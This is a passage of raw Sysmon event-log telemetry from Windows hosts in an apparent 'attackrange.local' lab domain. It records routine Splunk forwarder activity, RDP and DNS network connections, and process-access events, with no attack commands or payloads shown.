Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EB1BF92E87C91D8E5BE2C36FBE5A088,SHA256=835DF02B4DBFDE16BC9ACC25EF8AC4077E9FD984627A79D2027B1FBB7E594CC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979515Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:23.371{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C597DAAE8407AC8A53A40107B4CE336E,SHA256=BAC817B58E36D810077333BDBFBC6094E9C8BE9A5115320E8F2D6CF2DDE43D66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979514Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:23.137{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22CAA48825CB88A224A58EA27D9E5871,SHA256=31C9D8AF97F8E771F9E3761EA3E1884EC491CFDF178C8FC8C5455B9758B17BDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979513Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:19.987{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51323-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979512Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:19.746{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59427-false10.0.1.12-8000- 354300x8000000000000000979511Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:19.585{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59426-false10.0.1.14-49672- 354300x8000000000000000979510Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:19.585{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse10.0.1.15win-host-542.attackrange.local59811-false10.0.1.14-53domain 354300x8000000000000000979509Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:19.584{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:c8a0:5491:e98:ffff-59811-truea00:10e:0:0:0:0:0:0-53domain 354300x8000000000000000979508Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:19.211{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49286-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001050862Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:24.319{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=225A292EE7DB270519D6DA36CD444774,SHA256=3257857D07BC4E0414BC34956441CD3CD890EFFC63FF4CE508B9622627F86F15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979516Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:24.387{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC631645D3C414BF81F309C48B987C4A,SHA256=A4D5C1D50916B6802D66BBE8FF8322D89D8EFEAB2BDAE2DCFC9A753957B6D423,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979531Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.903{69CF5F33-8BAD-6151-DC79-00000000FD01}34721204C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979530Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BAD-6151-DC79-00000000FD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979529Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979528Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979527Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979526Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979525Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979524Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979523Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979522Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979521Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979520Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8BAD-6151-DC79-00000000FD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979519Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.715{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BAD-6151-DC79-00000000FD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979518Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.700{69CF5F33-8BAD-6151-DC79-00000000FD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979517Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:25.512{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8002E7440B6BABAE6A78923C0DBEDDE,SHA256=9BA8EB3D805F633231844EDCDC2033CF65357D2B26DF46ABBC2782E14EDD3AD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050865Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:25.848{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34D569EF917A093ED6C54DB43DD63203,SHA256=69B68C5AFD71A572842C50158846B46598C9EAD2F3C0950169E79C3B81134DC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050864Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:25.848{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EEE352D5232BBB0F829C401521DD9F8B,SHA256=F1E5C5CD1CA9A712332987E82619F9E635623E135B8D9912C3A07305C1AF90A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050863Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:25.349{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3916EBE06521130D5D520CA4AF23753C,SHA256=5F22DE085E9F03CFCF39CF4A87BCC7C8D9D5CE42C0A4E70894E1199F4FC4A9F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979560Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.934{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BAE-6151-DE79-00000000FD01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979559Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.934{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979558Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.934{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979557Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.934{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979556Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.934{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979555Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.934{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979554Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 